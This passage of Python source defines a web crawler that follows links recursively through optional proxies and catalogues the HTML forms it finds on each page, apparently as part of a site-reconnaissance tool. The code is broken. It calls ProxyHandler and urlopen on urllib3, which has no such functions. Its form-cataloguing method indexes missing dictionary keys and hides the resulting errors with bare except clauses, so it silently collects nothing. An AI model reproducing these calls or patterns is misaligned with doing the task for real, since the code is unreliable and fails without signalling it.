			proxyhost = proxyhost
			proxyuser = proxyuser
			proxypassword = proxypassword
			proxysecure = proxysecure
			proxyport = proxyport
			proxies = proxies

			if proxyhost != None and proxyport != None:
				if proxyuser != None and proxypassword != None: 
					proxies = urllib3.ProxyHandler({proxysecure: proxysecure+"://"+proxyuser+":"+proxypassword+"@"+proxyhost+":"+proxyport})
				else:
					proxies = urllib3.ProxyHandler({proxysecure: proxysecure+"://"+proxyhost+":"+proxyport})
			
			if proxies:
				urlRootSite = urllib3.urlopen(url, proxies=proxies)
			else:
				urlRootSite = urllib3.urlopen(url)

			contents = urlRootSite.read()
			rootSite = BeautifulSoup(contents, features="html5lib")
			links = rootSite.find_all("a")
			webForms[url] = self.storeWebSiteForms(url=url, proxies=proxies, forms=webForms)

			try:
				for link in links:
					#process = multiprocessing.Process(target=handleLink, args=[link])
					#process.daemon = True
					#process.start()	
					#process.join()
					if not "http" in link["href"]:
						link["href"] = '{url}{subdomain}'.format(url=url, subdomain=link["href"])
					self.handleLink(link=link, depth=depth, webForms=webForms, proxies=proxies, linksVisited=linksVisited, totalProfundity=totalProfundity)				
					totalProfundity = 0
			finally:
				pass
			return (linksVisited, webForms)
		except Exception as e:
			Logger.printMessage(message='{methodName}'.format(methodName='crawl'), description='{param}'.format(param=e), is_error=True, color=Fore.YELLOW)
			raise
		
	def handleLink(self, link, depth=100, webForms={}, proxies=None, linksVisited=[], totalProfundity=0):
		Logger.printMessage(message='{methodName}'.format(methodName='handleLink'), description='{param}'.format(param=link), debug_module=True)
		totalProfundity += 1	
		if ('href' in dict(link.attrs) and "http" in link['href']):
			try:
				href = link["href"]
				if href in linksVisited:
					return
				if proxies:
					urlLink = urllib3.urlopen(href, proxies=proxies)
				else:
					urlLink = urllib3.urlopen(href)
				linksVisited.append(link['href'])
				#Extract info about the link, before to get links in this page.
				if totalProfundity <= depth:
					linkSite = BeautifulSoup(urlLink, "lxml")
					depthLinks = linkSite.find_all("a")				
					webForms[link['href']] = self.storeWebSiteForms(url=link['href'], proxies=proxies, forms=webForms)
					for sublink in depthLinks:
						#processLink = multiprocessing.Process(target=self.handleLink, args=[sublink])
						#processLink.daemon = True
						#processLink.start()
						self.handleLink(link=sublink, depth=depth, webForms=webForms, proxies=proxies, linksVisited=linksVisited, totalProfundity=totalProfundity)
				else:
					totalProfundity -= 1
					return
			except:
				pass
	
	def storeWebSiteForms(self, url, proxies=None, forms={}):
		Logger.printMessage(message='{methodName}'.format(methodName='storeWebSiteForms'), description='{param}'.format(param=url), debug_module=True)
		browser = mechanize.Browser()		
		if proxies:
			browser.set_proxies(proxies)
		browser.open(url)
		try:
			for form_id, form in enumerate(browser.forms()):
				forms[str(form_id)] = {}
				if not forms[str(form_id)][form.action]:
					forms[str(form_id)][form.action] = {}
				forms[str(form_id)][form.action][form.method] = {}
				if not forms[str(form_id)][form.action][form.method][form.name]:
					forms[str(form_id)][form.action][form.method][form.name] = {}
				for control in form.controls:
					forms[str(form_id)][form.action][form.method][form.name][control] = {}
					if control.name:
						forms[str(form_id)][form.action][form.method][form.name][control]["name"] = control.name
					if control.type:
						forms[str(form_id)][form.action][form.method][form.name][control]["type"] = control.type
					if control.value:
						forms[str(form_id)][form.action][form.method][form.name][control]["value"] = control.value
		except AttributeError:
			pass
		except:
			pass
		return forms